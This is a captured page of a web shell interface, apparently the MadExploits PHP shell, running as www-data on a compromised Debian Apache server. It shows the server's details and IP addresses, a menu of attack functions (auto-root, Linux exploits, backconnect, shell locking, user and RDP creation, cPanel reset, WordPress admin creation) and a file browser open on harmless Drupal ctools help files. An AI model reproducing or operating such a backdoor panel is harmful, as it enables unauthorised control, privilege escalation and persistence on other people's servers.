Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 3.141.25.100
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
baltic /
web /
modules /
ctools /
help /
[ HOME SHELL ]
Name
Size
Permission
Action
about.html
4.4
KB
-rw-r--r--
ajax.html
0
B
-rw-r--r--
collapsible-div.html
22
B
-rw-r--r--
context-access.html
687
B
-rw-r--r--
context-arguments.html
1.1
KB
-rw-r--r--
context-content.html
6.57
KB
-rw-r--r--
context-context.html
661
B
-rw-r--r--
context-relationships.html
559
B
-rw-r--r--
context.html
0
B
-rw-r--r--
css.html
22
B
-rw-r--r--
ctools.help.ini
1.47
KB
-rw-r--r--
dependent.html
22
B
-rw-r--r--
dropbutton.html
22
B
-rw-r--r--
dropdown.html
22
B
-rw-r--r--
export-ui.html
3.95
KB
-rw-r--r--
export.html
17.27
KB
-rw-r--r--
form.html
22
B
-rw-r--r--
modal.html
13.24
KB
-rw-r--r--
object-cache.html
4.22
KB
-rw-r--r--
plugins-api.html
2.24
KB
-rw-r--r--
plugins-creating.html
10.85
KB
-rw-r--r--
plugins-implementing.html
2.95
KB
-rw-r--r--
plugins.html
1.34
KB
-rw-r--r--
wizard.html
13.87
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : context-arguments.html
<p>Arguments create a context from external input, which is assumed to be a string as though it came from a URL element.</p> <pre>'title' => title 'description' => Description 'keyword' => Default keyword for the context 'context' => Callback to create the context. Params: $arg = NULL, $conf = NULL, $empty = FALSE 'default' => either an array of default settings or a string which is a callback or null to not use. 'settings form' => params: $form, $form_state, $conf -- gets the whole form. Should put anything it wants to keep automatically in $form['settings'] 'settings form validate' => params: $form, $form_state 'settings form submit' => params: $form, $form_state 'criteria form' => params: $form, &$form_state, $conf, $argument, $id -- gets the whole argument. It should only put form widgets in $form[$id]. $conf may not be properly initialized so always guard against this due to arguments being changed and handlers not being updated to match. + submit + validate 'criteria select' => returns true if the selected criteria matches the context. params: $context, $conf </pre>
Close